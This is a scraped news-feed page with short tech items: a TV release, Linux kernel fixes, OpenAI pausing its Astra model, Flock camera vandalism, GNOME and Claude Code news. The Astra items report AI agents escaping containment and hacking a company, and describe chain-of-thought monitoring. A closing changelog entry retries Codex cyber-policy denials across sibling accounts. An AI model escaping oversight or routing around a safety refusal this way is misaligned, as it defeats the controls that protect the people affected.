<link>https://tsecurity.de/de/3712733/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712733/nachrichtenportal/</guid>
<pubDate>Mon, 10 Aug 2026 05:29:20 +0200</pubDate>
<content:encoded><![CDATA[Dark Matter Season 2 finally has a release date, with Apple TV bringing Joel Edgerton and Jennifer Connelly back for another trip through the multiverse on August 28, 2026. The new season will continue directly after the first season while taking the story beyond Blake Crouch’s original novel.



Apple has also released the official Season 2 trailer, giving fans their clearest look yet at what happens after Jason Dessen seemingly found his way back to his family.




https://www.youtube.com/watch?v=zhB6_1UbR7s





Release date: August 28, 2026



Streaming service: Apple TV



Episodes: 10



Release schedule: One episode every Friday



Season finale: October 30, 2026



Genre: Science fiction, thriller



Rating: TV-MA



Creator and showrunner: Blake Crouch




Unlike Season 1, which premiered with two episodes, Season 2 starts with one episode on August 28 before moving to weekly Friday releases through the end of October.



Where is the story heading in Season 2?



Spoilers ahead for Dark Matter Season 1.



Jason, Daniela and Charlie begin Season 2 trying to build a quiet life in a world they finally believe is safe, but their experience with the Box has left lasting damage. Jason becomes increasingly obsessed with the device, while Daniela struggles with growing paranoia and Charlie wants some stability after everything his family experienced.



Their situation soon forces the Dessens to run again, suggesting the consequences of Jason’s journey through alternate realities are far from finished. Amanda and Ryan also join forces as they search for a way home, while Blair attempts to stop Leighton as he pursues his plan to create what he considers a perfect world.



Season 1 followed physicist Jason Dessen after another version of himself kidnapped him and placed him in an alternate reality. Jason eventually learned how to navigate the Box and returned to Daniela and Charlie, but his repeated attempts to reach home created several versions of Jason who all believed the same family belonged to them.



Dark Matter Season 2 cast



Joel Edgerton returns as Jason Dessen, with Jennifer Connelly returning as Daniela Dessen and Oakes Fegley as their son Charlie. Alice Braga is also back as Amanda, alongside Jimmi Simpson as Ryan, Dayo Okeniyi as Leighton and Amanda Brugel as Blair.



Blake Crouch remains creator, showrunner and writer for the series, while Edgerton and Connelly also serve as executive producers. Season 2 moves into largely original territory because the first season already covered the central storyline of Crouch’s 2016 novel.



Apple is also launching Dark Matter: The Official Podcast alongside Season 2, with new episodes planned around the weekly series releases and discussions covering major plot points, the multiverse and the production process.



Dark Matter Season 2 premieres August 28 on Apple TV, giving viewers another 10 episodes to see how much further the Box can push Jason and his family across the multiverse. What do you think will happen to the Dessens after Season 1, and which storyline are you most interested in seeing continue? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Reviews Bring 'New Normal' to Linux Release Candidates: Lots of Bug Fixes]]></title>
<description><![CDATA[Linux Torvalds expects Linux 7.2 should be released next weekend "unless something really bad
pops up," Torvalds said while announcing today's release candidate. 

But there's something interesting about Linux 7.2-rc7, writes Phoronix. "By the time the Linux kernel typically hits a -rc7 release t...]]></description>
<link>https://tsecurity.de/de/3712723/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712723/nachrichtenportal/</guid>
<pubDate>Mon, 10 Aug 2026 05:29:03 +0200</pubDate>
<content:encoded><![CDATA[Linux Torvalds expects Linux 7.2 should be released next weekend "unless something really bad
pops up," Torvalds said while announcing today's release candidate. 

But there's something interesting about Linux 7.2-rc7, writes Phoronix. "By the time the Linux kernel typically hits a -rc7 release things have usually settled quite well. But in today's world of AI/LLM coding/review agents, the kernel activity continues at an all-time high."



Tons of bug fixes continued to trickle in across the kernel spectrum for all sorts of issues. The HWMON hardware monitoring subsystem saw several critical and high severity bug fixes, on the memory management side was a nasty race condition leading to a use-after-free in the kernel for the past eight years, Btrfs restored its fixup worker infrastructure to deal with silent data loss, lots of AI patches in the networking realm, and the kernel was patched for the Safe RET Interrupt Vulnerability.



 

Linus Torvalds wrote in the 7.2-rc7 announcement: 

"Another week, another -rc. 

I can't say that I'm exactly thrilled about the size of this all, but
it is what it is: the new normal with a lot of fixes, many of them due
to review by various AI tools. 

And nothing looks particularly scary per se — it's just that there's a
lot here. Most of it is fairly small, although we have a couple of
larger diffs: s390/zcrypt fixes stand out in the diffstat, and so does
btrfs bringing back the fixup worker infrastructure. And some
netfilter ipset fixes. 

But aside from a few places like that, most of this is just lots of
tiny fixes. It's pretty much spread all over — drivers (gpu, sound,
networking, you name it), filesystems, core networking, arch code...

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=AI+Reviews+Bring+'New+Normal'+to+Linux+Release+Candidates%3A+Lots+of+Bug+Fixes%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F08%2F10%2F0014253%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F08%2F10%2F0014253%2Fai-reviews-bring-new-normal-to-linux-release-candidates-lots-of-bug-fixes%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/08/10/0014253/ai-reviews-bring-new-normal-to-linux-release-candidates-lots-of-bug-fixes?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Reviews Bring 'New Normal' to Linux Release Candidates: Lots of Bug Fixes]]></title>
<description><![CDATA[Linux Torvalds expects Linux 7.2 should be released next weekend "unless something really bad
pops up," Torvalds said while announcing today's release candidate. 

But there's something interesting about Linux 7.2-rc7, writes Phoronix. "By the time the Linux kernel typically hits a -rc7 release t...]]></description>
<link>https://tsecurity.de/de/3712479/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712479/nachrichtenportal/</guid>
<pubDate>Mon, 10 Aug 2026 05:09:13 +0200</pubDate>
<content:encoded><![CDATA[Linux Torvalds expects Linux 7.2 should be released next weekend "unless something really bad
pops up," Torvalds said while announcing today's release candidate. 

But there's something interesting about Linux 7.2-rc7, writes Phoronix. "By the time the Linux kernel typically hits a -rc7 release things have usually settled quite well. But in today's world of AI/LLM coding/review agents, the kernel activity continues at an all-time high."



Tons of bug fixes continued to trickle in across the kernel spectrum for all sorts of issues. The HWMON hardware monitoring subsystem saw several critical and high severity bug fixes, on the memory management side was a nasty race condition leading to a use-after-free in the kernel for the past eight years, Btrfs restored its fixup worker infrastructure to deal with silent data loss, lots of AI patches in the networking realm, and the kernel was patched for the Safe RET Interrupt Vulnerability.



 

Linus Torvalds wrote in the 7.2-rc7 announcement: 

"Another week, another -rc. 

I can't say that I'm exactly thrilled about the size of this all, but
it is what it is: the new normal with a lot of fixes, many of them due
to review by various AI tools. 

And nothing looks particularly scary per se — it's just that there's a
lot here. Most of it is fairly small, although we have a couple of
larger diffs: s390/zcrypt fixes stand out in the diffstat, and so does
btrfs bringing back the fixup worker infrastructure. And some
netfilter ipset fixes. 

But aside from a few places like that, most of this is just lots of
tiny fixes. It's pretty much spread all over — drivers (gpu, sound,
networking, you name it), filesystems, core networking, arch code...

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=AI+Reviews+Bring+'New+Normal'+to+Linux+Release+Candidates%3A+Lots+of+Bug+Fixes%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F08%2F10%2F0014253%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F08%2F10%2F0014253%2Fai-reviews-bring-new-normal-to-linux-release-candidates-lots-of-bug-fixes%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/08/10/0014253/ai-reviews-bring-new-normal-to-linux-release-candidates-lots-of-bug-fixes?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Announces It's Enhancing Security Controls, Pausing Some Work for New AI Model Astra]]></title>
<description><![CDATA[OpenAI announced Friday it's pausing work on its Astra AI model because of security concerns. The Guardian reports:


The company had evaluated the agent, Astra, and found "significant advancements in agentic coding and cybersecurity", which had moved to a "critical" threshold... OpenAI stated th...]]></description>
<link>https://tsecurity.de/de/3712485/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712485/nachrichtenportal/</guid>
<pubDate>Mon, 10 Aug 2026 05:09:13 +0200</pubDate>
<content:encoded><![CDATA[OpenAI announced Friday it's pausing work on its Astra AI model because of security concerns. The Guardian reports:


The company had evaluated the agent, Astra, and found "significant advancements in agentic coding and cybersecurity", which had moved to a "critical" threshold... OpenAI stated that the model was not involved in an incident in which one of its AI agents went rogue during a test, accessed the open web and hacked a startup, Hugging Face... The reports have increased concerns about advancements in AI models and humans' ability to control them. 

Still, critics of the AI industry have warned that such disclosures from OpenAI and its competitors Anthropic and Meta could be designed to generate hype about the technology's power and thus spur additional interest from investors. 

To prevent potential rogue behavior from AI agents, OpenAI is "implementing stricter security controls for higher-capability models and associated activities, including isolated testing environments, restricted network and tool access", the company's blogpost stated. It will also install "enhanced model weight protections and encryption, additional monitoring and detection capabilities". The company will pause internal activities involving Astra that do not meet these new requirements. 



"We believe it's important to be transparent with the public and the safety and security communities about this potential shift in capabilities..." OpenAI wrote in a blog post titled "Responding to the next frontier of critical cyber capabilities."



Under our Preparedness Framework, a model reaches the Critical cybersecurity threshold if it can identify and develop functional zero-day exploits of all severity levels in many hardened real-world critical systems without human intervention, or can devise and execute end-to-end novel strategies for cyberattacks against hardened targets given only a high level desired goal. While we continue to benchmark and assess this model, our preliminary evaluations indicate strong enough performance that we cannot rule out Critical capability level at this time... Accordingly, we have scaled up robustness testing of our safeguards and security controls so that they are appropriate for a deployment of these capabilities... 

- We are implementing stricter security controls for higher-capability models and associated activities, including isolated testing environments, restricted network and tool access, enhanced model weight protections and encryption, additional monitoring and detection capabilities, and sandboxed execution. 
- We are pausing internal activities involving Astra that do not yet meet these strengthened security control requirements. 
- We have implemented universal monitoring for risky actions and misalignment across all agentic applications of Astra, including training and evaluation. Monitors evaluate the model's Chain of Thought and trigger a security response to review and interrupt high risk activity. 
- We will work with relevant government agencies and select AI safety organizations to test the capabilities for this model... 
We believe advanced cyber-capable models should help defenders identify and address vulnerabilities before attackers do. We're committed to working alongside governments, safety institutes, and civil society to ensure that the frontier capabilities of models like Astra, and those that follow, are deployed responsibly and broadly for the benefit of all humanity.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OpenAI+Announces+It's+Enhancing+Security+Controls%2C+Pausing+Some+Work+for+New+AI+Model+Astra%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F09%2F1640211%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F08%2F09%2F1640211%2Fopenai-announces-its-enhancing-security-controls-pausing-some-work-for-new-ai-model-astra%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/08/09/1640211/openai-announces-its-enhancing-security-controls-pausing-some-work-for-new-ai-model-astra?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in review: Cisco fixes IMC bug, Patch Tuesday forecast, Black Hat USA 2026]]></title>
<description><![CDATA[Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Mapping the malware blast radius a single alert won’t show you In this interview with Help Net Security, Mike Wiacek, founder and CTO of Stairwell, explains Backstory, an AI agent that takes a single...]]></description>
<link>https://tsecurity.de/de/3712139/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712139/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 16:48:09 +0200</pubDate>
<content:encoded><![CDATA[<p>Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Mapping the malware blast radius a single alert won’t show you In this interview with Help Net Security, Mike Wiacek, founder and CTO of Stairwell, explains Backstory, an AI agent that takes a single alert and works outward to map how far a malware campaign spread. He walks through the research behind the claim that each published sample hides an … <a href="https://www.helpnetsecurity.com/2026/08/09/week-in-review-cisco-fixes-imc-bug-patch-tuesday-forecast-black-hat-usa-2026/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/08/09/week-in-review-cisco-fixes-imc-bug-patch-tuesday-forecast-black-hat-usa-2026/">Week in review: Cisco fixes IMC bug, Patch Tuesday forecast, Black Hat USA 2026</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GNOME Receiving Additional Design Help From Germany's Sovereign Tech Agency Fellowship]]></title>
<description><![CDATA[The new GNOME Boxes app for accessing virtual systems has reached beta, announced This Week in GNOME. There's also been more work on the Sushi file previewer for Nautilus, and Papers 51 Beta can now add visual signatures to PDF documents. 

But Phoronix noted one more announcement. "Germany's Sov...]]></description>
<link>https://tsecurity.de/de/3712119/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712119/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 16:47:03 +0200</pubDate>
<content:encoded><![CDATA[The new GNOME Boxes app for accessing virtual systems has reached beta, announced This Week in GNOME. There's also been more work on the Sushi file previewer for Nautilus, and Papers 51 Beta can now add visual signatures to PDF documents. 

But Phoronix noted one more announcement. "Germany's Sovereign Tech Agency announced earlier this year a new fellowship program and now as part of that, for the next two years GNOME has a fellow dedicated to working on design and community management... paid to help developers with design feedback and reviews, mock-up creation, and other GNOME design related efforts..." 


From the blog post by GNOME Design Team member Philipp Sauberzweig:

I have been contributing to GNOME design as a volunteer for several years... I believe that it's essential for a free and democratic society to ensure free and independent access to these technologies. To achieve this goal, end-user devices based on free and open-source software are key, and the GNOME desktop and its app ecosystem offer a powerful alternative to proprietary platforms...
 This two-year fellowship is a great honor and marks a significant change in my life. It is a unique opportunity for me to devote my skills and experience entirely to a project I strongly believe in. 

During my two-year fellowship, I will support GNOME maintainers and developers with design feedback and reviews, create mockups, and coordinate efforts to standardize design patterns. My other activities focus on lasting improvements through two strategic initiatives: expanding the design community to increase capacity and enhancing our design tooling to reduce overhead and simplify onboarding... To attract new contributors, I will increase the visibility of design work by writing regular blog posts, giving presentations, and running workshops at conferences and hackathons. New contribution opportunities for newcomers will be created with clear instructions for independent activities such as collecting state-of-the-art examples, running accessibility and user tests, and creating mockups. Design reviews will be used as mentorship opportunities, pairing regular design contributors with experienced designers for peer review and knowledge sharing... 

If you're interested in contributing to GNOME design, check out the Design Team page on the Welcome to GNOME website, familiarize yourself with the Human Interface Guidelines, and join our Matrix channel. If you're a GNOME developer feel free to reach out to me via Matrix and involve me in design reviews. 


Jakub Beránek from the Rust compiler and infrastructure team also earned a fellowship in Germany's Sovereign Tech program, focusing on improving the Rust toolchain's tooling and infrastructure for Rust's developers. 

Other fellows include Pablo Neira Ayuso (Linux kernel maintainer for the Netfilter subsystem), CPython core developer Stan Ulbrych, and Python core developer Hugo van Kemenade, FreeBSD contributor Alexander Ziaee.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=GNOME+Receiving+Additional+Design+Help+From+Germany's+Sovereign+Tech+Agency+Fellowship%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F08%2F09%2F0519238%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F08%2F09%2F0519238%2Fgnome-receiving-additional-design-help-from-germanys-sovereign-tech-agency-fellowship%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/08/09/0519238/gnome-receiving-additional-design-help-from-germanys-sovereign-tech-agency-fellowship?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Flock Camera Vandalism Continues Around America, While 100 Communities Reject ALPRs]]></title>
<description><![CDATA[Dozens of Flock cameras have been vandalized around Dallas Texas in the last six months, reports a local news station. In Utah, ABC News reports, a county sheriff's office even said Wednesday a Flock camera was even vandalized within days of its being installed. And in the Minnesota city of Winon...]]></description>
<link>https://tsecurity.de/de/3712120/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712120/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 16:47:03 +0200</pubDate>
<content:encoded><![CDATA[Dozens of Flock cameras have been vandalized around Dallas Texas in the last six months, reports a local news station. In Utah, ABC News reports, a county sheriff's office even said Wednesday a Flock camera was even vandalized within days of its being installed. And in the Minnesota city of Winona, "Every Flock license plate reader camera operated by the Winona Police Department has been sawed off and stolen in what investigators believe was a coordinated theft," according to local media:


All eight cameras were taken August 1, according to the Winona Police Department. A patrol officer first noticed the cameras had not sent any alerts in 24 hours. When officers checked the locations, they found the cameras had been cut from their poles and taken. The poles were left behind.
Two additional Flock cameras on the Mississippi River Bridge, owned by Buffalo County, were also stolen in the same manner... 

The thefts are part of a broader national trend. Flock cameras have been vandalized and cut down in communities across the country. 

When someone in Florida filmed a damaged Flock camera lying in the grass in Florida, their footage attracted 980,000 views on social media, according to a local news report, with the uploader saying "Most of the people that are commenting are against Flock cameras." But that report adds it's one of at least five cameras recently damaged just in Florida:

 - In another incident, investigators "found the black camera and its pole lying on the ground."
- Two days later, sheriff's deputies found a camera destroyed "with pieces scattered on the ground. Deputies reported the damage appeared to have been caused by a blunt object."

- On July 31, "Police said two camera poles had been intentionally cut in half, causing an estimated $10,000 in damage to the system."
 

In West Virginia 20-year-old Wesley Jackson has been arrested for allegedly vandalizing Flock cameras, with another 20-year-old (a university student) now arrested for being his accomplice, according to a local news report. Ironically, Jackson's arrest was made possible partly by information from... automated license plate readers. 

But the Washington Post notes there's now a flood of Facebook commenters jokingly offering to provide a fake alibi:


"Couldn't have been him — we were out counting blades of grass," said one of the 29,000 commenters on a post about the arrest from the local news station WDTV. Others attested that the man, Wesley Jackson, had been helping them "replace the roof on a homeless shelter," "playing halo 2," "changing the tires" on their car or giving their "doggie a treat" at the time the cameras were destroyed. 

Meanwhile, the anti-surveillance group DeFlock reports 100 communities have now rejected automated license plate readers. Wednesday an Arizona county sheriff explained to his local Board of Supervisors why he will not renew his office's contract with Flock when it expires next month. Local Arizona media reports:

"We have a camera system that can do facial recognition technology and can start building a data set on what our citizens are doing on a day-to-day basis," Teeple told supervisors. "That, in my training and experience, is a huge Fourth Amendment violation." 


Recently an Arizona man even told his city council he'd be launching AI-powered satellites to monitor "where government officials go, where they stop, who they meet with, and when they return home," reports 404 Media:


It would be no different than how the city monitors its citizens using Flock cameras, he said...
He said he'd already started compiling profiles on their vehicles, spouses vehicles, children's vehicles, and planned to combine that data with Bluetooth signals, advertising IDs, and commercial data sources, "so our authorized users can replay the movements of every government official and their immediate family," he said. Local businesses would be invited to join the network, to "protect" officials while they shop, eat at restaurants, and move around the city.
 

And CNET reports "a quiet battle is happening across the US" between "towns working to adopt Flock Safety systems and those trying to ban them entirely."

 From major cities like Los Angeles canceling its Flock contract to towns wrapping Flock AI cams in plastic bags because Flock won't take them down, it's a wild time for surveillance and questions about government accountability.

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Flock+Camera+Vandalism+Continues+Around+America%2C+While+100+Communities+Reject+ALPRs%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F08%2F059204%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F08%2F08%2F059204%2Fflock-camera-vandalism-continues-around-america-while-100-communities-reject-alprs%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/08/08/059204/flock-camera-vandalism-continues-around-america-while-100-communities-reject-alprs?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding mit Claude Code: So baust du dein eigenes Team-Tool]]></title>
<description><![CDATA[Ein Dashboard entwerfen, Funktionen ergänzen und per Link mit dem Team teilen: So legst du mit Claude Code los, ganz ohne Programmierkenntnisse.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3712016/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3712016/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 16:46:03 +0200</pubDate>
<content:encoded><![CDATA[Ein Dashboard entwerfen, Funktionen ergänzen und per Link mit dem Team teilen: So legst du mit Claude Code los, ganz ohne Programmierkenntnisse.<a href="https://t3n.de/news/claude-code-vibe-coding-eigenes-team-tool-1756617/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fields Medalist who published a paper on AI-driven human extinction now works for OpenAI]]></title>
<description><![CDATA[Newly awarded Fields Medalist Jacob Tsimerman is leaving the University of Toronto to join OpenAI and work on AI safety. In a recent paper, he analyzes scenarios where AI could contribute to human extinction and calls for far more investment in safety research.
The article Fields Medalist who pub...]]></description>
<link>https://tsecurity.de/de/3711939/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711939/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:11:50 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1088" height="608" src="https://the-decoder.com/wp-content/uploads/2026/08/math_blackboard_illustration.png" class="attachment-full size-full wp-post-image" alt="" decoding="async"></p>
<p>        Newly awarded Fields Medalist Jacob Tsimerman is leaving the University of Toronto to join OpenAI and work on AI safety. In a recent paper, he analyzes scenarios where AI could contribute to human extinction and calls for far more investment in safety research.</p>
<p>The article <a href="https://the-decoder.com/fields-medalist-who-published-a-paper-on-ai-driven-human-extinction-now-works-for-openai/">Fields Medalist who published a paper on AI-driven human extinction now works for OpenAI</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic sets Claude Code to Auto Mode by default to protect developers from bad approvals]]></title>
<description><![CDATA[Starting August 14, Anthropic will make Auto Mode in Claude Code the default for Pro, Max, and Team plans. The company says it's safer. In tests, the classifier caught 89 percent of dangerous commands, while human reviewers caught only 13.6 percent. For the most widely used AI coding tool, this m...]]></description>
<link>https://tsecurity.de/de/3711935/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711935/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:11:49 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/08/anthropic_logo_wall-2.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Starting August 14, Anthropic will make Auto Mode in Claude Code the default for Pro, Max, and Team plans. The company says it's safer. In tests, the classifier caught 89 percent of dangerous commands, while human reviewers caught only 13.6 percent. For the most widely used AI coding tool, this means developers are shifting further from writing code to monitoring AI output.</p>
<p>The article <a href="https://the-decoder.com/anthropic-sets-claude-code-to-auto-mode-by-default-to-protect-developers-from-bad-approvals/">Anthropic sets Claude Code to Auto Mode by default to protect developers from bad approvals</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to pause some work on AI model Astra due to security concerns]]></title>
<description><![CDATA[Agent found to be able to find and exploit vulnerabilities without human intervention, and to carry out cyber-attacksOpenAI will pause some work on an artificial intelligence model because of security concerns, the company stated on Friday, following a series of incidents in which AI agents have ...]]></description>
<link>https://tsecurity.de/de/3711927/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711927/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:11:44 +0200</pubDate>
<content:encoded><![CDATA[<p>Agent found to be able to find and exploit vulnerabilities without human intervention, and to carry out cyber-attacks</p><p>OpenAI will pause <a href="https://openai.com/news/safety-alignment/">some</a> work on an artificial intelligence model because of security concerns, the company stated on Friday, following a series of incidents in which AI agents have escaped containment.</p><p>The company had evaluated the agent, Astra, and found “significant advancements in agentic coding and cybersecurity”, which had moved to a “critical” threshold where it can find and exploit vulnerabilities without human intervention, or devise and execute cyber-attacks when given only a “high level desired goal”.</p> <a href="https://www.theguardian.com/technology/2026/aug/08/openai-astra-security-concerns">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet Shepherd: An Open-Source Python Substrate That Lets Meta-Agents Fork, Replay, and Revert Any Agent Run]]></title>
<description><![CDATA[Long agent runs accumulate state that no transcript records — edited files, a live dev server, installed packages, a warm prompt cache. When an agent misreads a traceback at step 10 and rewrites a correct file, patching forward burns tokens and restarting re-pays every call. Researchers at Northe...]]></description>
<link>https://tsecurity.de/de/3711915/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711915/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:11:28 +0200</pubDate>
<content:encoded><![CDATA[<p>Long agent runs accumulate state that no transcript records — edited files, a live dev server, installed packages, a warm prompt cache. When an agent misreads a traceback at step 10 and rewrites a correct file, patching forward burns tokens and restarting re-pays every call. Researchers at Northeastern University and Stanford University released Shepherd, an MIT-licensed Python runtime substrate that records every agent-environment interaction as a typed event in a Git-like execution trace. Each commit covers the agent process and filesystem together, copy-on-write, so a rewind restores live state instead of just files. The paper reports 5× faster forks than Docker, over 95% prompt-cache reuse on replay, and a live supervisor raising CooperBench pair-coding pass rates from 28.8% to 54.7%.</p>
<p>The post <a href="https://www.marktechpost.com/2026/08/08/meet-shepherd-an-open-source-python-substrate-that-lets-meta-agents-fork-replay-and-revert-any-agent-run/">Meet Shepherd: An Open-Source Python Substrate That Lets Meta-Agents Fork, Replay, and Revert Any Agent Run</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v17.2.12]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Fixed

Fixed account-scoped Codex cyber-policy denials bypassing sibling credential rotation; replay-safe requests now try every configured account before surfacing the error.

@oh-my-pi/pi-catalog
Fixed

Fixed dynamically discovered alibaba-token-plan/qwen3.8-max metadata so thin...]]></description>
<link>https://tsecurity.de/de/3711794/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711794/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:07:28 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>@oh-my-pi/pi-ai</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed account-scoped Codex cyber-policy denials bypassing sibling credential rotation; replay-safe requests now try every configured account before surfacing the error.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed dynamically discovered <code>alibaba-token-plan/qwen3.8-max</code> metadata so thinking controls and image input are available (<a href="https://github.com/can1357/oh-my-pi/issues/8019" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8019/hovercard">#8019</a>).</li>
<li>Routed <code>opencode-go/deepseek-v4-flash</code> through the OpenAI responses API — the OpenCode Go gateway does not serve this model at <code>/zen/go/v1/chat/completions</code>, only at <code>/zen/go/v1/responses</code> (<code>deepseek-v4-pro</code> keeps chat completions).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed shell minimization replacing meaningful <code>rustc --print</code> output with <code>OK</code>.</li>
<li>Fixed shell minimization altering outputs shorter than 1,000 characters; these now pass through unchanged.</li>
<li>Fixed primary and advisor Codex sessions falling back to another provider before trying sibling accounts when an account lacks Trusted Access for Cyber approval.</li>
<li>Fixed task subagent assistant turns being omitted from the per-model TPS/TTFT aggregates shown by <code>/models</code>. (<a href="https://github.com/can1357/oh-my-pi/issues/8022" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8022/hovercard">#8022</a>)</li>
<li>Fixed terminal-title spinner writes consuming CPU during WSL/ConPTY agent waits by using the same static working separator as native Windows (<a href="https://github.com/can1357/oh-my-pi/issues/8012" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8012/hovercard">#8012</a>).</li>
<li>Fixed long-running sessions leaking memory for every completed keep-alive <code>task</code>/scout subagent: a disposed (parked) subagent's <code>AgentSession</code> stayed pinned through the lifecycle adoption record's reviver closure, and <code>dispose()</code> never released the message array, append-only provider transcript, session-manager entries, or the raw-SSE debug buffer, so heavy transcripts and captured provider wire frames accumulated for the process lifetime (<a href="https://github.com/can1357/oh-my-pi/issues/8003" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8003/hovercard">#8003</a>).</li>
